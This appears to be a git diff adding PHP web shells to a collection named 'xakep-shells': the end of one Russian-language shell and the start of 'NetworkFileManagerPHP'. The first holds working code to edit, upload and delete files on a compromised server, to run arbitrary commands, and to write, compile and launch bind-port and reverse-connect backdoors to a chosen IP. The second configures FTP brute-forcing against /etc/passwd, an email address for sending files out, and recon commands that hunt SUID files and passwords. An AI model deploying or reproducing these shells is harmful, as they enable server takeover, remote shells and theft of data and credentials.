+<input type=HIDDEN name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Ñîõðàíèòü èçìåíèÿ'></form><br>
+
+";
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+$editf=stripslashes($editf);
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
+exit;
+}
+ 
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<a href='?ac=tar&d=$d' title='Àðõèâàöèÿ ïðîèçîéäåò òîëüêî ïðè íàëè÷èè ïðàâ çàïèñè â êàòàëîã !'><b>[Àðõèâàöèÿ êàòàëîãà] </b></a>
+<a href='?ac=tar&as=mail&d=$d' title='Ïðîèñõîäèò àðõèâàöèÿ êàòàëîãà + îòïðàâêà àðõèâà íà âàø e-mail ! Ô-öèÿ íå äîñòóïíà â 0.5à âåðñèè!'><b>[Àðõèâàöèÿ êàòàëîãà + Îòïðàâêà íà å-mail] </b></a>
+<a href='?ac=navigation&d=$d&deldir=1' title='Ïîëíîå óäàëåíèå êàòàëîãà !\n Ñïðàøèâàòü ïîäòâåðæäåíèÿ òåáÿ íèêòî íå áóäåò :)'><b>[Óäàëåíèå êàòàëîãà] </b></a>
+<tr><td bgcolor=#4d9ef0><center><b>Íàçâàíèå</b></td><td bgcolor=#4d9ef0><b>Ðàçìåð</b></td><td bgcolor=#4d9ef0><b>Äîñòóï</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïðåùåí !</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+for ($i=0;$i<sizeof($dirs);$i++) {
+   if ($dirs[$i] != "..") {
+
+
+if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#aed7ff";}else{$color="#68adf2";}
+$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color>$info</td></tr>";
+}
+}
+for ($i=0;$i<sizeof($files);$i++) {
+if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$prava=perm($perms);
+if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'title='Äîñòóï $prava. Âëàäåëåö $owner/$group'>$files[$i]</a></td><td bgcolor=$color>$siz</td><td bgcolor=$color>$prava</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+break;
+// Óñòàíîâêà áåêäîðà
+case "backconnect":
+echo "<b>Óñòàíîâêà áåêäîðà / îòêðûòèå ïîðòà</b>";
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>Îòêðûòü ïîðò </b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>Ïàðîëü äëÿ äîñòóïà </b>";
+echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Îòêðûòü>";
+echo "</font>";
+echo "</form>";
+
+echo "<b>Óñòàíîâêà áåêäîðà / áåêêîííåêò</b>";
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>IP-àäðåñ </b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>Ïîðò </b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Îøèáêà! Íå ìîãó çàïèñàòü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Îøèáêà! Íå ìîãó çàïèñàòü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<br>Ðåçóëüòàò: ";
+echo "<font color=red size=2";
+print "".passthru($_POST['cmd'])."";
+echo "</font></b>";
+break;
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>Çàãðóçêà ôàéëîâ</b>
+<a href='$php_self?ac=massupload&d=$d&t=massupload'>* Çàãðóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *</a><br><br>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéë:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td><br>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéë óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãðóçèòü ôàéë. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+
+
+echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
+<b>Çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà:</b><br>
+ HTTP ïóòü ê ôàéëó: <br>
+<input type='text' name='file3' value='http://' size=40><br>
+Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà: <br>
+<input type='text' name='file2' value='$docr/' size=40><br>
+<input type='submit' value='Çàãðóçèòü ôàéë'></form>";
+
+
+if (!isset($status)) downfiles();
+
+else
+{
+
+$data = @implode("", file($file3));
+$fp = @fopen($file2, "wb");
+@fputs($fp, $data);
+$ok = @fclose($fp);
+if($ok)
+{
+$size = filesize($file2)/1024;
+$sizef = sprintf("%.2f", $size);
+
+print "<br><center>Âû çàãðóçèëè: <b>ôàéë <u>$file2</u> ðàçìåðîì</b> (".$sizef."êÁ) </center>";
+}
+else
+{
+print "<br><center><font color=red  size = 2><b>Îøèáêà çàãðóçêè ôàéëà</b></font></center>";
+}
+}
+
+
+
+break;
+// Tools
+case "tools":
+echo "<form method=post>Ãåíåðàöèÿ md5 øèôðà<br><input name=md5 size=30></form><br>";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5 ñãåíåðèðîâàí:<br> ".md5($md5)."";}
+echo "<br>
+<form method=post>Êîäèðîâàíèå/äåêîäèðîâàíèå base64<br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+Êîäèðîâàíî:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
+Äåêîäèðîâàíî: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post>DES êîäèðîâàíèå:<br><input name=des size=30></form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "Des ñãåíåðèðîâàí: <br>".crypt($des)."";}
+echo "<br>
+<form method=post>SHA1 êîäèðîâàíèå:<br><input name=sha1 size=30></form><br>";
+if(@$_POST['sha1']){
+@$des=@$_POST['sha1'];
+echo "SHA1 ñãåíåðèðîâàí: <br>".sha1($sha1a)."";}
+
+echo "<form method=POST>";
+echo "html-êîä -> øåñòíàäöàòèðè÷íûå çíà÷åíèÿ<br><input type=text name=data size=30>";
+
+
+if (isset($_POST['data']))
+{
+echo "<br><br><b>Ðåçóëüòàò:<br></b>";
+$str=str_replace("%20","",$_POST['data']);
+for($i=0;$i<strlen($str);$i++)
+{
+$hex=dechex(ord($str[$i]));
+if ($str[$i]=='&') echo "$str[$i]";
+else if ($str[$i]!='\\') echo "%$hex";
+}
+}
+exit;
+break;
+// Mass Uploading
+case "massupload":
+
+
+echo "
+Ìàñîâàÿ çàãðóçêà ôàéëîâ:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$docr'><br>
+<input type=submit value=Çàãðóçèòü name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile20</i><br>";}
+}
+
+exit;
+break;
+case "selfremover":
+ print "<tr><td>";
+print "<font color=red face=verdana size=1>Òû óâåðåí, ÷òî õî÷åø óäàëèòü ýòîò øåëë ñ ñåðâåðà ?<br>
+<a href='$php_self?p=yes'>Äà, õî÷ó</a> | <a href='$php_self?'>Íåò, ïóñòü åùå ïîáóäåò</a><br>
+Áóäåì óäàëÿòü: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!!!";
+print "<tr><td><font color=red>Ôàéë $path íå óäàëåí !</td></tr>";
+}else{$hmm="Óäàëåí";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+break;
+
+
+?>
+
+
+
diff --git a/xakep-shells/PHP/NetworkFileManagerPHP.php.txt b/xakep-shells/PHP/NetworkFileManagerPHP.php.txt
new file mode 100644
index 0000000..a0cf326
--- /dev/null
+++ b/xakep-shells/PHP/NetworkFileManagerPHP.php.txt
@@ -0,0 +1,5603 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="effes2004@gmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel #hack.ru";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* port scanner */
+
+$min="1";
+
+$max="65535";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ports and services names */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+$port[19] = "character generator";
+
+$port[20] = "ftp-data";
+
+$port[21] = "ftp";
+
+$port[22] = "ssh, pcAnywhere";
+
+$port[23] = "Telnet";
+
+$port[25] = "SMTP (Simple Mail Transfer)";
+
+$port[27] = "ETRN (NSW User System FE)";
+
+$port[29] = "MSG ICP";
+
+$port[31] = "MSG Authentication";
+
+$port[33] = "dsp (Display Support Protocol)";
+
+$port[37] = "time";
+
+$port[38] = "RAP (Route Access Protocol)";
+
+$port[39] = "rlp (Resource Location Protocol)";
+
+$port[41] = "Graphics";
+
+$port[42] = "nameserv, WINS";
+
+$port[43] = "whois, nickname";
+
+$port[44] = "MPM FLAGS Protocol";
+
+$port[45] = "Message Processing Module [recv]";
+
+$port[46] = "MPM [default send]";
+
+$port[47] = "NI FTP";
+
+$port[48] = "Digital Audit Daemon";
+
+$port[49] = "TACACS, Login Host Protocol";
+
+$port[50] = "RMCP, re-mail-ck";
+
+$port[53] = "DNS";
+
+$port[57] = "MTP (any private terminal access)";
+
+$port[59] = "NFILE";
+
+$port[60] = "Unassigned";
+
+$port[61] = "NI MAIL";
+
+$port[62] = "ACA Services";
+
+$port[63] = "whois++";
+
+$port[64] = "Communications Integrator (CI)";
+
+$port[65] = "TACACS-Database Service";
+
+$port[66] = "Oracle SQL*NET";
+
+$port[67] = "bootps (Bootstrap Protocol Server)";
+
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+
+$port[70] = "Gopher";
+
+$port[71] = "Remote Job Service";
+
+$port[72] = "Remote Job Service";
+
+$port[73] = "Remote Job Service";
+
+$port[74] = "Remote Job Service";
+
+$port[75] = "any private dial out service";
+
+$port[76] = "Distributed External Object Store";
+
+$port[77] = "any private RJE service";
+
+$port[78] = "vettcp";
+
+$port[79] = "finger";
+
+$port[80] = "World Wide Web HTTP";
+
+$port[81] = "HOSTS2 Name Serve";
+
+$port[82] = "XFER Utility";
+
+$port[83] = "MIT ML Device";
+
+$port[84] = "Common Trace Facility";
+
+$port[85] = "MIT ML Device";
+
+$port[86] = "Micro Focus Cobol";
+
+$port[87] = "any private terminal link";
+
+$port[88] = "Kerberos, WWW";
+
+$port[89] = "SU/MIT Telnet Gateway";
+
+$port[90] = "DNSIX Securit Attribute Token Map";
+
+$port[91] = "MIT Dover Spooler";
+
+$port[92] = "Network Printing Protocol";
+
+$port[93] = "Device Control Protocol";
+
+$port[94] = "Tivoli Object Dispatcher";
+
+$port[95] = "supdup";
+
+$port[96] = "DIXIE";
+
+$port[98] = "linuxconf";
+
+$port[99] = "Metagram Relay";
+
+$port[100] = "[unauthorized use]";
+
+$port[101] = "HOSTNAME";
+
+$port[102] = "ISO, X.400, ITOT";
+
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+
+$port[105] = "CCSO name server protocol";
+
+$port[106] = "poppassd";
+
+$port[107] = "Remote Telnet Service";
+
+$port[108] = "SNA Gateway Access Server";
+
+$port[109] = "POP2";
+
+$port[110] = "POP3";
+
+$port[111] = "Sun RPC Portmapper";
+
+$port[112] = "McIDAS Data Transmission Protocol";
+
+$port[113] = "Authentication Service";
+
+$port[115] = "sftp (Simple File Transfer Protocol)";
+
+$port[116] = "ANSA REX Notify";
+
+$port[117] = "UUCP Path Service";
+
+$port[118] = "SQL Services";
+
+$port[119] = "NNTP";
+
+$port[120] = "CFDP";
+
+$port[123] = "NTP";
+
+$port[124] = "SecureID";
+
+$port[129] = "PWDGEN";
+
+$port[133] = "statsrv";
+
+$port[135] = "loc-srv/epmap";
+
+$port[137] = "netbios-ns";
+
+$port[138] = "netbios-dgm (UDP)";
+
+$port[139] = "NetBIOS";
+
+$port[143] = "IMAP";
+
+$port[144] = "NewS";
+
+$port[150] = "SQL-NET";
+
+$port[152] = "BFTP";
+
+$port[153] = "SGMP";
+
+$port[156] = "SQL Service";
+
+$port[161] = "SNMP";
+
+$port[175] = "vmnet";
+
+$port[177] = "XDMCP";
+
+$port[178] = "NextStep Window Server";
+
+$port[179] = "BGP";
+
+$port[180] = "SLmail admin";
+
+$port[199] = "smux";
+
+$port[210] = "Z39.50";
+
+$port[213] = "IPX";
+
+$port[218] = "MPP";
+
+$port[220] = "IMAP3";
+
+$port[256] = "RAP";
+
+$port[257] = "Secure Electronic Transaction";
+
+$port[258] = "Yak Winsock Personal Chat";
+
+$port[259] = "ESRO";
+
+$port[264] = "FW1_topo";
+
+$port[311] = "Apple WebAdmin";
+
+$port[350] = "MATIP type A";
+
+$port[351] = "MATIP type B";
+
+$port[363] = "RSVP tunnel";
+
+$port[366] = "ODMR (On-Demand Mail Relay)";
+
+$port[371] = "Clearcase";
+
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+
+$port[389] = "LDAP";
+
+$port[407] = "Timbuktu";
+
+$port[427] = "Server Location";
+
+$port[434] = "Mobile IP";
+
+$port[443] = "ssl";
+
+$port[444] = "snpp, Simple Network Paging Protocol";
+
+$port[445] = "SMB";
+
+$port[458] = "QuickTime TV/Conferencing";
+
+$port[468] = "Photuris";
+
+$port[475] = "tcpnethaspsrv";
+
+$port[500] = "ISAKMP, pluto";
+
+$port[511] = "mynet-as";
+
+$port[512] = "biff, rexec";
+
+$port[513] = "who, rlogin";
+
+$port[514] = "syslog, rsh";
+
+$port[515] = "lp, lpr, line printer";
+
+$port[517] = "talk";
+
+$port[520] = "RIP (Routing Information Protocol)";
+
+$port[521] = "RIPng";
+
+$port[522] = "ULS";
+
+$port[531] = "IRC";
+
+$port[543] = "KLogin, AppleShare over IP";
+
+$port[545] = "QuickTime";
+
+$port[548] = "AFP";
+
+$port[554] = "Real Time Streaming Protocol";
+
+$port[555] = "phAse Zero";
+
+$port[563] = "NNTP over SSL";
+
+$port[575] = "VEMMI";
+
+$port[581] = "Bundle Discovery Protocol";
+
+$port[593] = "MS-RPC";
+
+$port[608] = "SIFT/UFT";
+
+$port[626] = "Apple ASIA";
+
+$port[631] = "IPP (Internet Printing Protocol)";
+
+$port[635] = "RLZ DBase";
+
+$port[636] = "sldap";
+
+$port[642] = "EMSD";
+
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+
+$port[655] = "tinc";
+
+$port[660] = "Apple MacOS Server Admin";
+
+$port[666] = "Doom";
+
+$port[674] = "ACAP";
+
+$port[687] = "AppleShare IP Registry";
+
+$port[700] = "buddyphone";
+
+$port[705] = "AgentX for SNMP";
+
+$port[901] = "swat, realsecure";
+
